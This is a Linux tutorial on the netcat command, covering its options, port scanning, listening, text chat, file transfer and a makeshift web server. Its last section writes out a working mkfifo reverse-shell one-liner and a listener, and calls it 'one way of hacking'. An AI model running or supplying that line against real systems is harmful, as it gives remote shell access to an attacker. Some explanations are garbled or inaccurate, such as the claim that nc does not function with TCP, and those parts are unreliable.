What the NC command is for in Linux

The netcat command is necessary for sending and receiving data using TCP and UDP protocols. It does not have a large set of functions, but it is sufficient for connection checking and simple debugging. How to communicate through the TCP protocol? This question is asked by many users. In this article we will answer this question and also show examples of real application of the command.

What does the command do?

The netcat (or nc) command is a powerful tool for working with network connections. It is often used by system administrators and developers for various tasks. Here are the main functions and features of netcat:

1. Establishing TCP/UDP connections: allows you to establish connections to remote hosts using TCP and UDP protocols.
2. Port Listening: can be used as a server to listen for incoming connections on a specific port
3. Data transfer: transfer data between computers over a network. This can be useful for file transfer or messaging.
4. Debugging network applications: used to test and debug network services, allowing you to send and receive arbitrary data.
5. Creating simple chat rooms: simple text conversations between two systems can be set up
6. Port scanning: can be used to check for open ports on remote hosts
7. Tunneling: can be used to create tunnels to redirect traffic through other ports or hosts.
8. Working with proxies: can be used to work with proxy servers and perform various networking tasks.

netcat is a versatile tool that can be used in a wide variety of scenarios, from simple messaging to complex network operations.

Options

Let's start by looking at the syntax and the most popular ones:

• -6 - use IPv6 protocol. The default is -4 and IPv4 respectively;
• -h - display help with the list of available parameters;
• -i - delay - add delay between sending strings or scanning ports. It is set in seconds;
• -l - listen mode. Used with port specification;
• -N - close the connection when the end of the file is reached when sending it;
• -n - Work with IP-addresses directly without DNS, also disable port scanning;
• -P - user_name - specify user name to connect to the proxy;
• -x - address:port - specify the address and port to connect to the proxy;
• -p - port - specify port number. In most cases the port is read without specifying the parameter;
• -U - use UNIX domain socket (for interprocess communication);
• -u - use UDP protocol, by default TCP is used;
• -v - detailed mode. Used when scanning;
• -W number_packets - close the connection after receiving a certain number of packets;
• -w timer - enable timer to limit the connection time. It is set in seconds;
• -z - disable data sending. It is used during scanning.

The command has the following form (parameters port address):

$ nc

Next we will tell you how to use the command.

Checking the port

Checking is the main use of netcat. You should use two parameters -vz, specify address and port. You can specify a range of addresses, but in this case it is better to sift only open ports with the command grep. Let's scan the ports of the local network address:

$ nc -vz 192.168.31.247 8080

$ nc -vz 192.168.31.247 1-1000 2>&1 | grep succeeded

In the same way, let's scan UDP ports by adding the -u parameter:

$ nc -vzu 192.168.31.247 1-1000 2>&1 | grep succeeded

You should know the main difference between TCP and UDP. So in UDP ports are always available.

Listening to the port

The -l parameter is intended for listening to the port. It is often enough, but you can enable the detailed mode:

$ nc -nlv 8080

Remember that when using the TCP protocol, the port must be free, otherwise the error Already in use will appear. Not all ports can be used by normal users, for example, port 80 (HTTP), most likely it will be occupied by another process and will require superuser rights.

File Sharing

A useful ability of the command is data exchange. A simple example is a text chat room. In order to start a chat on one computer, run the utility in the port listening mode:

$ nc -lp 8080

On the other computer, you will need to specify the address of the first computer and the same port. Also do not forget to check that port is open:

$ nc 0.0.0.0 8080

This way you will be able to send and receive messages. That is, the command is intended for file exchange. The principle is the same, except that it is necessary to redirect the output to a file, namely paste.txt:

$ nc -l 8080 > paste.txt

On the other PC, the file copy.txt will serve as input. It is not superfluous to use the -N parameter to close the connection after file transfer:

$ nc -N 0.0.0.0 8080 < copy.txt

For file transfer, it is important to follow the sequence, first open listening and only then send the file. The nc command is a working, but far from the best way to transfer files. There are more efficient and useful tools for this task.

A simple web server

Since the NC command does not function with the TCP protocol, it allows both sending and receiving HTTP requests. Hence, the utility can become a simple web server. Yes, you can't do anything trickier than a blank page in this way, but the operation will take almost no time, and the plus is that you don't need to install anything additional.

On the example form HTTP response with the file index.html. If we talk about np itself, it is not superfluous to set a timer with the -w 1 parameter to break the connection if the browser does not do it:

$ while true; do echo -e "HTTP/1.1 200 OKnn$(cat index.html)" | nc -l -w 1 -p 8080; done

To get data from a website, you can form a request and send it to the advised address and port. But this way is quite complicated, it is better to use the appropriate CURL command.

Remote Shell

Based on the examples discussed above, it will not be difficult to conclude that the command allows you to organize remote access to the shell of the computer. Previously, the NC utility had several parameters for opening access to the terminal. The -e parameter has been removed from the utility long ago, so there will be no simple access to the terminal anymore. The security of the application itself has become higher, but it can still work in conjunction with others.

Let's show the connection using the named channel mkfifo. First of all, let's start listening to the port on the PC where we will get access:

$ nc -lvnp 8080

Let's go directly to the command to open the terminal. First, delete the old named channel(rm /tmp/f), create a new one in its place(mkfifo /tmp/f), read its contents(cat /tmp/f), and send a shell command to its output(sh -i 2>&1). After that, it remains to run nc with output to our named channel(nc 0.0.0.0.0 8080 >/tmp/f):

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 0.0.0.0 8080 >/tmp/f

Keep in mind that this is one way of hacking, however, it may be useful in case of ssh problems. In order to prevent the attack configure a security policy and firewall.